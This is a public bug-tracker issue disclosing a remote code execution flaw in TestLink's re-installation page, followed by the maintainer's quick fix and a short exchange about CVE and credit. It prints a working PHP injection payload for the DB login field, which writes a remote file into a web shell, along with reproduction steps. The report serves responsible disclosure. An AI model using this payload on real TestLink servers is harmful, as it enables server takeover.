Mantis Bugtracker 

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0008209TestLinkSecurity - Generalpublic2018-02-23 05:472018-02-25 13:42
ReporterManish Tanwar 
Assigned Tofman 
PlatformOSOS Version
Product Version1.9.16 (2016 Q4) 
Fixed in Version1.9.17 (2018 Q1) 
Summary0008209: Remote Code Execution

During code audit (version 1.9.14 and 1.9.17) i came to know about Remote Code Execution security issue.
This issue is on script installation page (install/installNewDB.php).
Once Script installation has been done, again user can perform re-installation by navigating to "/install/" directory. Script will ask for MySQL credentials and if user provide credentials of a MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username,password and need to specify "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" this PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in file.
After that attacker just need to need to access the config file with following GET hethod HTTP parameters
testlink/ [^]
It will dump PHP web shell in base directory with name shell.php.
Steps To Reproduce-> Navigate to "/install" directory.
-> Follow the instructions as per the installation page till we get web page in which we have to specify the MySQL server credentials.
-> Specify the Remote MySQL server IP, root user account username and password in Database Host, Database admin login and password fields respectively.
-> specify below mentioned PHP code in "Testlink db login" input field and any password in "TestLink DB password" input filed.
-> Click "Process Testlink Setup" button and observe the response.
-> Open the "" file in text editor and observe that the file contains "define('DB_USER', 'box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//');" which is PHP code injection.
TagsNo tags attached.
Database (MySQL,Postgres,etc)MySQL
PHP Version
QA Team - Task Workflow StatusREADY FOR TESTING
Attached Filespng file icon testlink POC.png [^] (171,492 bytes) 2018-02-23 05:47

- Relationships

-  Notes
fman (administrator)
2018-02-24 09:31

Thanks, going to check
fman (administrator)
2018-02-24 16:22

please get latest code from github, retest and provide feedback
fman (administrator)
2018-02-24 16:24 [^]
Manish Tanwar (reporter)
2018-02-24 17:58


I have checked the patch applied, it seems fixed.
In case if i get any bypass, will register issue ticket.

I want to know how to get CVE ID for this security issue, if you can help me, please let me know.
Happy and Safe Coding.

Thank You
fman (administrator)
2018-02-24 18:01

can not help with CVE, never done
Manish Tanwar (reporter)
2018-02-24 18:02

That's fine i will check with someone else :)
So are you going to mention my name in next release for security bug fix?

- Issue History
Date Modified Username Field Change
2018-02-23 05:47 Manish Tanwar New Issue
2018-02-23 05:47 Manish Tanwar File Added: testlink POC.png
2018-02-24 09:31 fman Note Added: 0027229
2018-02-24 16:22 fman Note Added: 0027235
2018-02-24 16:24 fman QA Team - Task Workflow Status => READY FOR TESTING
2018-02-24 16:24 fman Note Added: 0027236
2018-02-24 16:24 fman Status new => resolved
2018-02-24 16:24 fman Fixed in Version => 1.9.17 (2018 Q1)
2018-02-24 16:24 fman Resolution open => fixed
2018-02-24 16:24 fman Assigned To => fman
2018-02-24 17:58 Manish Tanwar Note Added: 0027240
2018-02-24 18:01 fman Note Added: 0027241
2018-02-24 18:01 Manish Tanwar Note View State: 0027240: private
2018-02-24 18:02 Manish Tanwar Note Added: 0027242
2018-02-24 18:03 Manish Tanwar Note View State: 0027242: private
2018-02-24 18:40 Manish Tanwar Note View State: 0027240: public
2018-02-24 18:40 Manish Tanwar Note View State: 0027242: public
2018-02-25 13:42 fman View Status private => public

Copyright © 2000 - 2018 MantisBT Team
Powered by Mantis Bugtracker